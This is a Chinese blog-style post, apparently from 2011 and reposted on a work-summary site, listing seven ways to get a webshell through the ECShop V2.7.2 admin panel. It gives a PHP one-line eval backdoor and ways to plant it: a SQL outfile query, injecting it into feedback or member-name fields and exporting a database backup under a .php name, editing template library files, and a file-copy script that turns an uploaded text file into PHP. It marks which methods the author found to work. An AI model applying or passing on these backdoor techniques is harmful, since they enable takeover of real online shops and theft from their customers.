ecshop后台拿shell个人总结七种方法 -个人工作总结

ecshop后台拿shell个人总结七种方法 -个人工作总结

ecshop后台拿shell个人总结七种方法2011-03-19 09：30ecshop后台拿shell个人总结七种方法2011年03月18日星期五19：10最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后，测试后台拿shell。本人整理给自己看的，大家飘过就好。BY：黑猫ecshop后台拿shell个人总结七种方法一、(本人测试已经失效)系统==数据库管理==sql查询(可爆出物理路径)：==创建表失败，导不出shell==show databases；use数据库名；create a(cmd text not null)；insert into a(cmd)values(?php eval($_POST[cmd])；?)；select cmd from ainto outfile导出路径；drop table if exists a；==创建表失败，导不出shell===二、(本人测试已经成功)前台留个言，内容是我们的一句话木马：?php eval($_POST[cmd])；?接着在后台系统==数据库管理==数据备份==选择自定义备份，选择ecs_feedback这张表(存放留言的表)备份文件名：x.php；.sql(x.php.sql形式出错，菜刀链接不成功)然后菜刀链接成功三、(本人测试已经成功)1、添加会员，会员名称插入插入一句话：?php eval($_POST[cmd])；?，其他随便填写。2、系统==数据库管理==数据备份---自定义备份---选"XXX_users"(其中XXX因各站而异，是数据前缀)3、备份文件名为mm.php；.sql 4、一句话客户端连接mm.php；.sql，地址一般为四、(本人测试已经成功)模板管理==库项目管理==选择myship.lbi配送方式。在文件内容最后面加入一句话代码：?php eval($_POST[cmd])；?菜刀链接成功。说明：有些服务器过滤了eval导致失败。五、(发布权限)(本人测试已经失效)代码省略对Media没有任何限制.直接Type=Media上传你的解密webshell访问路径为六、(测试成功，别人2011.02.05的记录)上传txt并且没有过滤任何函数.于是运用到了php的文件操作…script language="php"$file=file_get_contents("C：\Inetpub\wwwroot\ecshop\data/Article/1286344719152816497.txt")；if($file){$file="C：\Inetpub\wwwroot\ecshop\data/Article/1286344719152816497.txt"；$newfile=C：\Inetpub\wwwroot\ecshop\data/distant.php；a.txt；copy($file,$newfile)；}/script将以上代码插入库项目管理中的myship.ini打开即在目录下生成distant.php；a.txt菜刀连接之…搞定.七、(本人测试已经失效)进入后台-系统设置-Flash播放器管理-直接上传x.php ecshop V2.7.2版本已经没有这个选项，所以这个已经失效。

【ecshop后台拿shell个人总结七种方法 -个人工作总结】相关文章：

个人的工作总结06-05

个人安全工作总结04-28

个人研修工作总结05-25

个人周工作总结04-24

个人工作总结06-15

个人销售工作总结02-27

个人半年工作总结03-04

个人转正工作总结03-14

个人季度工作总结04-03

个人实习工作总结04-03